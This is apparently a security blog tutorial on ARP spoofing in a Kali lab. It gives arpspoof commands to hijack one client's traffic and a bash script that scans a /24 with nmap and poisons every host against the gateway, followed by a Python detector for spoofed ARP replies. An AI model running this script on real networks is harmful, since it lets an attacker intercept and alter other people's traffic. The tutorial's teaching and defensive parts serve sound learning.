ARP spoofing bomb

Good day ordinary and extraordinary security people. Let’s take a look at “ARP spoofing” today and make it even more interesting by creating a script that redirects the entire subnet to you. As in the “MitM Proxy on Kali” blog, we will use our Kali 2023.1 again, since everything we need is already installed. So boot up the VM and get ready, let’s get started!

But first, a quick digression about ARP and what ARP spoofing actually is. If you already know this, you can skip it. ARP stands for “Address Resolution Protocol” and is a network protocol that resolves IP addresses to MAC addresses. Similar to looking up the street address that belongs to a name, ARP looks up the MAC address of a device when only its IP address is known. Each device has a unique MAC address, while IP addresses are used by the Internet Protocol to identify devices. When a device wants to send data to an IP address, it looks in its ARP table for the corresponding MAC address. If there is no entry, it broadcasts an ARP request to the network to ask who has that IP address. The response is then entered into the ARP table so that future packets can be sent directly. In this way, ARP facilitates communication between devices on a network.

ARP spoofing is a technique in which an attacker exploits the Address Resolution Protocol (ARP) to spread false MAC address information and redirect traffic on a network. By sending forged ARP messages, the attacker poses as another device and tricks other devices on the network into using the attacker’s MAC address instead of the intended destination. This allows the attacker to eavesdrop on all traffic, intercept or even manipulate sensitive information. ARP spoofing can also be used for denial-of-service attacks, where the attacker floods the network with fake ARP messages, causing congestion. To protect against ARP spoofing, network monitoring and intrusion detection systems can be implemented, or static ARP tables can be used. These can help detect suspicious traffic or protect against tampering. It is important to be aware of the dangers of ARP spoofing and to take appropriate protective measures to ensure the security and integrity of the network. Note, however, that this is a local attack: ARP messages are not routed, so it only works against devices on the same layer-2 segment as the attacker.

Ok, now that we know all this, we can use the tool “arpspoof” in Kali to exploit this quite easily. We want to make a client communicate with us first instead of directly with its gateway (in our case the firewall), and vice versa. This means that all connections from the client to the firewall and from the firewall to the client should go through our attacker machine.

Single target

To warm up our knowledge a bit, we’ll just hijack the traffic of a single machine with the tool. First, we need to know the IP addresses of the target systems. In our case, the client “172.16.1.140” and the firewall “172.16.1.1”, that’s all. Our attacker machine in this example has the IP address “172.16.1.139” and a MAC address ending in “0A-14-31”. First, let’s look at the ARP table on the Windows system we want to attack with the “arp -a” command.

We can see that our default gateway has a MAC address ending in “0a-14-12”. With the following commands in Kali, we now attack the Windows system and trick it into thinking that we now have the IP address “172.16.1.1”.

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 -t 172.16.1.140 -r 172.16.1.1

You can immediately see that the MAC address in the ARP table for the firewall has changed. Attack complete, all traffic is now flowing through our machine 🙂

Cool stuff, but what can you do with it? For example, you can use the tool “dnsspoof” to redirect all or only selected DNS lookups to another IP. Or you can use Wireshark to record the traffic (not so interesting in times of HTTPS), or you can use “Driftnet” to sniff images. A million ways to attack.

Subnet redirection

Our real goal, as announced, is to have all clients on the network run through us. Be warned, this is like launching a fighter jet on the network, it’s pretty loud. Anyway, it’s fun, so let’s write the script. First, we use “nmap” to find all hosts in the network and then redirect them to us with “arpspoof”. The gateway is always the other end, because we want to capture the outgoing traffic. Let’s go.

#!/bin/bash
# find hosts on subnet
  rm -f "./nmaphosts.txt"                     # -f: don't abort on the first run when the file does not exist yet
  ip=$(ip -4 -o addr show eth0 | awk '{print $4}' | cut -d/ -f1)   # our own address, independent of ifconfig's column layout
  gw=$(ip r | grep default | awk '{print $3}')
  ip_range=$(echo "$ip" | cut -d"." -f1-3).0/24   # assumes a /24 subnet
  nmap "$ip_range" -sn -oG "./nmaphosts.txt" >/dev/null
# forward the hijacked traffic instead of dropping it (same step as in the single-target example)
  sysctl -w net.ipv4.ip_forward=1 >/dev/null
# arp spoofing: one arpspoof per discovered host, each paired with the gateway
  for line in $(cat ./nmaphosts.txt)
  do
    if [[ $line =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
      # skip ourselves and the gateway; this needs && (with || the test was always true)
      if [[ "$line" != "$ip" ]] && [[ "$line" != "$gw" ]]; then
        arpspoof -i eth0 -t "$line" -r "$gw" &
      fi
    fi
  done

To exit the script, just type exit on the console. This is quick and dirty code; of course it can be tidied up with grep etc., but I leave that to you 🙂

What can you do to protect yourself against such attacks? Unfortunately, not much. On the one hand, you could tune your network monitoring to look for it, because as mentioned, at the network level it is extremely noisy. On the other hand, you could use static ARP tables. This is not an option for clients, but maybe for a crown jewel server? I have never done that.
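The two defences mentioned above and in the ARP spoofing introduction, monitoring and static entries, can be shown together on the post’s own lab addresses. The following is an added example and not code from the post: it parses raw Ethernet/ARP frames, seeds the monitor with known-good bindings (the equivalent of a static ARP table) and raises an alert when a reply tries to move 172.16.1.1 or 172.16.1.140 to a different MAC, which is exactly what “arpspoof -t 172.16.1.140 -r 172.16.1.1” does in both directions. The frames are constructed in the script; only the MAC suffixes 0a-14-12 and 0a-14-31 are taken from the post, the rest of the MACs are made up.

```python
import socket
import struct

# Constructed lab values for the post's subnet (sample data, not captured traffic).
# Only the suffixes 0a-14-12 (firewall) and 0a-14-31 (Kali) come from the post.
GATEWAY_MAC = bytes.fromhex("0050560a1412")   # 172.16.1.1, the firewall
ATTACKER_MAC = bytes.fromhex("0050560a1431")  # 172.16.1.139, the Kali box
CLIENT_MAC = bytes.fromhex("0050560a1477")    # 172.16.1.140, the Windows client (made up)

def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an IPv4 ARP reply (opcode 2), the packet type arpspoof sends."""
    eth = struct.pack("!6s6sH", target_mac, sender_mac, 0x0806)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 2, sender_mac,
                      socket.inet_aton(sender_ip), target_mac, socket.inet_aton(target_ip))
    return eth + arp

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4 ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, sha, socket.inet_ntoa(spa), tha, socket.inet_ntoa(tpa)

class ArpMonitor:
    # Learns IP->MAC bindings from replies and flags a reply that moves a known IP to a new MAC.
    def __init__(self, static=None):
        self.table = dict(static or {})   # pre-seeded entries play the role of static ARP entries
        self.alerts = []

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:   # only replies poison a cache
            return None
        _, sha, spa, _, tpa = parsed
        known = self.table.get(spa)
        if known is not None and known != sha:
            alert = f"{spa} moved from {known.hex(':')} to {sha.hex(':')} in a reply to {tpa}"
            self.alerts.append(alert)
            return alert
        self.table[spa] = sha   # first sighting: learn it, as a switch or host cache would
        return None

def demo():
    # One genuine reply, then the two-way poisoning that the post's -t/-r command produces.
    mon = ArpMonitor(static={"172.16.1.1": GATEWAY_MAC, "172.16.1.140": CLIENT_MAC})
    mon.feed(arp_reply(GATEWAY_MAC, "172.16.1.1", CLIENT_MAC, "172.16.1.140"))    # legitimate
    mon.feed(arp_reply(ATTACKER_MAC, "172.16.1.1", CLIENT_MAC, "172.16.1.140"))   # client side poisoned
    mon.feed(arp_reply(ATTACKER_MAC, "172.16.1.140", GATEWAY_MAC, "172.16.1.1"))  # gateway side poisoned
    return mon
```

Fed from a live capture instead of demo(), the same feed() loop is the “sensitized monitoring” from the paragraph above; a monitor seeded only with the crown-jewel entries and never updating them is the static-table variant.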

That’s it so far, stay tuned and see you soon!

** Midjourney prompt: “malware attack explosion”